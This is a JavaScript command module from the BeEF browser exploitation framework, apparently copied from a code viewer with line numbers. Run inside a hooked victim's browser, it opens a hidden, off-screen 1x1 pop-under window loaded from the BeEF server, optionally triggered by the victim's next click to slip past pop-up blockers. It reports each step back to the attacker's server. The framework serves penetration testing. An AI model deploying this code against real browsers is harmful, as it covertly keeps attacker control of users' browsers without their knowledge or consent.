1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
9
  var popunder_name = Math.random().toString(36).substring(2,10);
10

11
  function popunder() {
12
    beef.debug("[Create Pop-Under] Creating window '" + popunder_name + "' for '" + popunder_url + "'");
13
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window requested');
14

15
    try {
16
      window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
17
      window.focus();
18
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window successfully created!', beef.are.status_success());
19
    } catch(e) {
20
      beef.debug("[Create Pop-Under] Could not create pop-under window");
21
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Pop-under window was not created', beef.are.status_error());
22
    }
23

24
    if (document.removeEventListener) {
25
      // Every sane browser
26
      document.removeEventListener("click", popunder);
27
    } else {
28
      // IE8 and earlier
29
      document.detachEvent("onclick", popunder);
30
    }
31
  }
32

33
  if ('<%= @clickjack %>' == 'on') {
34
    beef.debug("[Create Pop-Under] Waiting for click event...");
35
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Waiting for click event');
36
    if (document.addEventListener) {
37
      // Every sane browser
38
      document.addEventListener("click", popunder);
39
    } else {
40
      // IE8 and earlier
41
      document.attachEvent("onclick", popunder);
42
    }
43
  } else {
44
    popunder();
45
  }
46
});
47

48